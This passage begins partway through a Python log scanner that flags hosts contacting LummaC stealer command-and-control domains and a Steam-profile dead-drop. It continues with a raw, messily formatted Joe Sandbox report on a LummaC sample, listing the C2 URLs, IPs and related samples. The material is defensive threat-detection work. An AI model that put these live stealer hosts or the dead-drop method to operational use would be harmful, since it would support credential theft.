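SAMPLE_LOG = [
    "2024-10-12T10:01:02Z dns 10.0.0.15 A steamcommunity.com",
    "2024-10-12T10:01:03Z http 10.0.0.15 GET https://steamcommunity.com/profiles/76561199724331900",
    "2024-10-12T10:01:05Z dns 10.0.0.15 A sergei-esenin.com",
    "2024-10-12T10:01:06Z http 10.0.0.15 POST https://sergei-esenin.com/api",
    "2024-10-12T10:01:09Z dns 10.0.0.15 A cdn.eaglepawnoy.store",
    "2024-10-12T10:02:00Z dns 10.0.0.22 A store.steampowered.com",
    "2024-10-12T10:02:01Z http 10.0.0.22 GET https://steamcommunity.com/market/",
    "2024-10-12T10:02:05Z dns 10.0.0.22 A notclearancek.site",
]
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kind>dns|http)\s+(?P<src>\S+)\s+(?P<a>\S+)\s+(?P<b>\S+)$")


def host_matches(host: str) -> Optional[str]:
    """Return the C2 apex for an exact or subdomain match; the suffix test is anchored on a dot."""
    h = host.lower().rstrip(".")
    for apex in LUMMA_C2_DOMAINS:
        if h == apex or h.endswith("." + apex):
            return apex
    return None


def url_matches(url: str) -> Optional[str]:
    p = urlsplit(url)
    host = (p.hostname or "").lower()
    path = p.path.rstrip("/")
    apex = host_matches(host)
    if apex:
        return f"c2:{apex}" if path == C2_PATH else f"c2-host:{apex}"
    canon = f"https://{host}{path}"  # drop scheme variations, port and query before comparing
    if any(canon == u or canon.startswith(u + "/") for u in DEAD_DROP_URLS):
        return "dead-drop:steam-profile"
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, source host, tag) for every log line that matches an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["kind"] == "dns":
            apex = host_matches(m["b"])
            tag = f"c2-dns:{apex}" if apex else None
        else:
            tag = url_matches(m["b"])
        if tag:
            hits.append((m["ts"], m["src"], tag))
    return hits


def infected_hosts(hits: List[Tuple[str, str, str]]) -> List[str]:
    """A host is flagged on a request to <c2>/api, or on the dead-drop fetch followed by a C2 lookup."""
    kinds_by_src = {}
    for _, src, tag in hits:
        kinds_by_src.setdefault(src, set()).add(tag.split(":")[0])
    return sorted(src for src, kinds in kinds_by_src.items()
                  if "c2" in kinds or {"dead-drop", "c2-dns"} <= kinds)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(*hit)
    print("infected:", infected_hosts(found))
```

The 10.0.0.22 host in the constructed log browses Steam normally and resolves a look-alike domain, and produces no hit; 10.0.0.15 shows the full sequence (profile fetch, C2 lookup, request to /api) and is flagged.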
    Contacted URLs:

    | Name | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|
    | studennotediw.store | true | | unknown |
    | dissapoiznw.store | true | | unknown |
    | https://steamcommunity.com/profiles/76561199724331900 | true | URL Reputation: malware | unknown |
    | eaglepawnoy.store | true | | unknown |
    | bathdoomgaz.store | true | | unknown |
    | clearancek.site | true | | unknown |
    | spirittunek.store | true | | unknown |
    | licendfilteo.site | true | | unknown |
    | mobbipenju.store | true | | unknown |
    | https://sergei-esenin.com/api | true | | unknown |
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://sergei-esenin.com/file.exe, 00000000.00000003.1359433873.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565531432.0000000000CA7000.00000004.00000020.00020000.00000000.sdmptrueunknown
        https://www.cloudflare.com/learning/access-manqqxfile.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.valvesoftware.com/legal.htm | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vP | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://eaglepawnoy.store:443/api | file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamsta | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://store.steampowered.com/privacy_agreement/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akam | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://steamcommunity.com:443/profiles/76561199724331900 | file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://steamcommunity.com/profiles/76561199724331900S) | file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://store.steampowered.com/points/shop/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sergei-esenin.com:443/api% | file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/ | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://www.cloudflare.com/learning/access-man | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://store.steampowered.com/privacy_agreement/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.cloudflare.com/5xx-error-landing | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sergei-esenin.com/apitory | file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://sergei-esenin.com:443/api | file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sergei-esenin.com/apit | file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://avatars.akamai.steamstatic | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://store.steampowered.com/about/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://steamcommunity.com/my/wishlist/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://help.steampowered.com/en/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://steamcommunity.com/market/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://store.steampowered.com/news/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sergei-esenin.com/ER | file.exe, 00000000.00000003.1359433873.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565531432.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://store.steampowered.com/subscriber_agreement/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://steamcommunity.com/discussions/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://sergei-esenin.com/apiX | file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://store.steampowered.com/stats/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://store.steampowered.com/steam_refunds/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sergei-esenin.com/apiJ | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
https://community.akamai.steamstatic.co | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=e | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://steamcommunity.com/workshop/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://store.steampowered.com/legal/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_resp | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.5.dr | false | URL Reputation: safe | unknown
https://store.steampowered.com/ | file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://studennotediw.store:443/api | file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilevC | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://steamcommunity.com/K) | file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://steamcommunity.com/lin | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://spirittunek.store:443/api | file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vP05w | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGt | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://store.steampowered.com/account/cookiepreferences/ | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://clearancek.site:443/apiz | file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://store.steampowered.com/mobile | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://steamcommunity.com/ | file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl | file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://steamcommunity.com/profiles/76561199724331900/badges | file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
172.67.206.204 | sergei-esenin.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532571
Start date and time: 2024-10-13 17:45:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@2/5@10/2
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.21
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 7352 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:46:12 | API Interceptor | 4x Sleep call for process: file.exe modified
13:32:32 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
172.67.206.204 | file.exe | malicious | LummaC | -
 | file.exe | malicious | LummaC | -
 | Setup.exe | malicious | LummaC | -
 | Setup.exe | malicious | LummaC | -
 | file.exe | malicious | LummaC | -
 | file.exe | malicious | LummaC | -
 | WxmEM5HgjY.exe | malicious | LummaC | -
 | file.exe | malicious | LummaC | -
 | Setup.exe | malicious | LummaC | -
 | file.exe | malicious | LummaC | -

Match | Associated Sample Name / URL | Detection | Threat Name | Context
